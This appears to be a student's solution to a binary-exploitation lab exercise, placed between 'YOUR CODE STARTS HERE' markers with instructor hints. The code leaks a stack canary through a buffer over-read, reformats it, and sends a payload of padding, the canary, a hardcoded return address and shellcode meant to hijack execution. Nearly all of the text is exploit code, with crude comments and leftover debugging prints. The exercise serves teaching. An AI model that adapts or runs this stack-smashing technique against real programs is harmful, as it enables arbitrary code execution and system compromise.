### YOUR CODE STARTS HERE ### # CANARY @ 0xbffff708 # Example send: p.send('B' * 12 + "\\x" + '\n') #full_canary = p.recvline() full_canary = p.recv(17) print(full_canary) canary_stripped = full_canary[13:] # Remove 13th byte which is always '\\x\n\0' print("Canary:", canary_stripped, len(canary_stripped)) # c.buffer at 0xbffff6f4 (ends at 0xbffff704) # eip stored at 0xbffff710 rip = '\x14\xf7\xff\xbf' # 0xbffff714 ## Format the fucking canary sp = ":".join("{:02x}".format(ord(c)) for c in canary_stripped) print(sp) hex_can = canary_stripped.encode('hex') print(hex_can) hex_format = '' for i in range(0,len(hex_can),2): hex_format += chr(int(hex_can[i:i+2],16)) ## dat_string ='\x00' + 'A' * 15 + hex_format + 'B' *4 + rip + SHELLCODE + '\n' print (dat_string) p.send(dat_string) ''' # Example receive: assert p.recvline() == 'testA' # HINT: the last line of your exploit should look something like: # p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n') # where m, canary, n and rip are all values you must determine # and you might need to add a '\x00' somewhere ''' ### YOUR CODE ENDS HERE ###